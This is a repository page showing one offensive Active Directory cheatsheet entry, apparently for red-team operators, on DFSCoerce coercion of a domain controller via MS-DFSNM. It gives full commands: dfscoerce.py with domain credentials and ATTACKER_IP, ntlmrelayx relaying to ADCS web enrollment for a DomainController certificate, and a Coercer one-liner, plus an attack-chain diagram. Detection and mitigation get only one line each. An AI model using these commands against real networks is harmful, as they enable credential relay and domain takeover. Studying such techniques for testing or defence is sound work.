daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-77-dfscoerce-ms-dfsnm-coercion.md (2912B)


      1 ---
      2 title: "Attack #77 β€” DFSCoerce MS-DFSNM Coercion"
      3 description: "DFSCoerce abuses the MS-DFSNM (Distributed File System Namespace Management) protocol to coerce a target machine (typically a DC) into authenticating to…"
      4 category: active-directory
      5 subcategory: "Advanced & Post-Exploitation"
      6 tags: ["active-directory", "adcs", "ntlm", "relay"]
      7 tools: []
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/πŸ”· Attack #77 β€” DFSCoerce MS-DFSNM Coercion.md"
     11 ---
     12 # πŸ”· Attack #77 β€” Coercion via DFSCoerce / MS-DFSNM
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 DFSCoerce abuses the **MS-DFSNM** (Distributed File System Namespace Management) protocol to coerce a target machine (typically a DC) into authenticating to an attacker-controlled host. It's functionally similar to PetitPotam (#41) and PrinterBug (#42) β€” a coercion technique that feeds into NTLM relay chains (ESC8, RBCD, etc.). DFSCoerce requires authentication but works on fully patched DCs where PetitPotam's unauthenticated variant has been fixed.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Any domain user credentials** | Authentication required |
     27 | **DFS role installed on target** | Default on DCs in many environments |
     28 | **Relay target** | ADCS, LDAP, etc. |
     29 
     30 ***
     31 
     32 ## πŸ’» Full Commands
     33 
     34 ```bash
     35 # ── DFSCoerce ─────────────────────────────────────────────────────────────────
     36 python3 dfscoerce.py -u low_user -p 'Password1' -d corp.local \
     37   LISTENER_IP DC01.corp.local
     38 
     39 # ── Combined with ESC8 ───────────────────────────────────────────────────────
     40 # Terminal 1:
     41 ntlmrelayx.py -t http://CA01.corp.local/certsrv/certfnsh.asp --adcs --template DomainController
     42 # Terminal 2:
     43 python3 dfscoerce.py -u low_user -p 'Password1' -d corp.local ATTACKER_IP DC01.corp.local
     44 
     45 # ── Coercer (all-in-one β€” includes DFSCoerce) ────────────────────────────────
     46 coercer coerce -u low_user -p 'Password1' -d corp.local \
     47   -l LISTENER_IP -t DC01.corp.local --filter-protocol-name MS-DFSNM
     48 ```
     49 
     50 ***
     51 
     52 ## πŸ›‘οΈ Detection β€” Event IDs
     53 
     54 | Event ID | Source | What to Look For |
     55 |---|---|---|
     56 | **4624** | Security Log | DC authenticating to unexpected workstation |
     57 
     58 ***
     59 
     60 ## πŸ”— Attack Chain Context
     61 
     62 ```
     63 [DFSCoerce] ──→ NTLM Coercion via MS-DFSNM β†’ relay to ADCS/LDAP
     64          β”‚
     65          β”œβ”€β”€β†’ πŸ”— Alternative coercion when PetitPotam is patched
     66          β”œβ”€β”€β†’ πŸ”— Chains with: ESC8 (#33), RBCD (#17), UD (#15)
     67          └──→ πŸ’€ Defeated by: block outbound NTLM from DCs, enable EPA
     68 ```
     69 
     70 ***
     71 
     72 > βœ… **Attack #77 β€” DFSCoerce complete.**